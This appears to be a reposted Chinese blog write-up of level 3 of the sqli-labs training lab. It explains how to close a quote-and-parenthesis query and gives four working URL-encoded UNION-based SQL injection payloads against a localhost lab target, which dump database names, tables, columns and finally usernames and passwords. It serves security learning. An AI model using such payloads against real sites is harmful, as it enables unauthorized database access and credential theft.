数据库
首页 > 数据库> > sqli-libs(3)

sqli-libs(3)

作者:互联网

今天我们来讲解 sqli-libs(3)

有括号的单引号报错  首先我们来查看加入'看报错了 在加‘’ 没报错 证明 存在注入

然后我们看加入’的报错回显的是什么

和我们的sqli-libs(1)的报错对比一下

发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句

我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1')闭合前面的括号和引号 而后面的直接用%23闭合就行了

了解了语句构造方法后 我们开始执行我们的命令了

0x01爆数据库名称 和当前数据库

http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23

这里我们知道我们的当前数据库所以就不进行爆破了

0x02爆表名

http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23

0x03爆列名

http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23

0x04爆字段名

http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,group_concat(username,0x3a,password)%20from%20users%23

其实在sql前面的关卡 只要你找到绕过思路 后面那些语句都是一样的 所以主要是思路

切记 少就是多 慢就是快

标签:27,20select%,23,sqli,报错,libs,id,schema
来源: https://www.cnblogs.com/-zhong/p/10887474.html